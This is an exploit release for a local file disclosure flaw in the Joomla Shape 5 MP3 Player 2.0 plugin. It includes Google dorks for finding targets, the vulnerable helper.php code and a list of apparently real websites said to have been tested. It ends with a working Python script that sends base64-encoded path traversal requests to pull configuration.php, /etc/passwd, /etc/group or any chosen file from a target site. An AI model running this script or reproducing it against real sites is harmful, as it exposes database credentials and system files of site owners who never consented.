.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Joomla <= (Shape 5 MP3 Player 2.0) Local File Disclosure Exploit ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] Skype : knockoutr@msn.com [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Greetz : b3mb4m, ZoRLu, KedAns-Dz ( milw00rm.com ) =================================================================== ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Joomla |~Plugin : Shape 5 MP3 Player 2.0 |~Affected Version : 2.0 |~Software : http://extensions.joomla.org/extension/shape-5-mp3-player |~RISK : High |~Google Dork : inurl:"php?fileUrl=" site:ru |~Google Dork : inurl:plugins/content/s5_media_player =================================================================== ======================Info========================================= helper.php unconsciously encoded. This is a very simple security measures, It was exposed to attack. if base64 encrypting the file names 'fileurl' function is used, and local files will be easily exposed. ============ Error line's in helper.php =========================== <?php $path = base64_decode($_REQUEST['fileurl']); $base = basename($path); $path1 = str_replace(' ','%20',$path); header('Content-Description: File Transfer'); header('Content-Type:application/octet-stream'); header('Content-Transfer-Encoding: Binary'); header("Content-disposition: attachment; filename=\"".basename($path)."\""); header('Content-Length: ' . filesize($path)); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); readfile($path1); exit; ?> ====================================================================== ======================== Tested on Demos ============================ www.kraskinotv.ru www.alexandra-pavlyuk.ru www.kovspas.ru www.asetkz.ru www.cciheredia.cr www.helicopterspray.com www.kpu-karawang.go.id www.practicalbioethics.org www.iccfoundation.us www.mixticius.net www.stbarnabasdulwich.org www.ahavathachim.com www.dcbaptist.org www.stjohnmansfield.org www.ilyda.com www.mountainviewchapel.com www.biamd.org www.lavingtonunited.org www.cypressbible.org www.brianmcgilloway.com www.toneside.com .. etc .. ======================================================================= ================ usage: python h4.py www.site.com ==================== import base64 import sys import urllib def exploit(): while True: print """ [1] = configuration.php [2] = Try Read /etc/passwd [3] = Try Read /etc/group """ command = raw_input("h4 Console# ") if command == "1": command = base64.b64encode("../../../configuration.php") elif command == "2": command = base64.b64encode("../../../../../../../../../etc/passwd") elif command == "3": command = base64.b64encode("../../../../../../../../../etc/group") else: command = base64.b64encode(command) url = "http://%s/plugins/content/s5_media_player/helper.php?fileurl=%s" % (sys.argv[1],command) try: test = urllib.urlopen(url) if len(test.read()) <= 0: print "Exploit failed .." else: urllib.urlretrieve(url, command) #wget.download(url) print "Exploit success ! " except Exception as e: print "Unexpected error : %s " % e if __name__ == '__main__': if len(sys.argv) > 2: print "Error usage : python exploit.py website.com" else: exploit()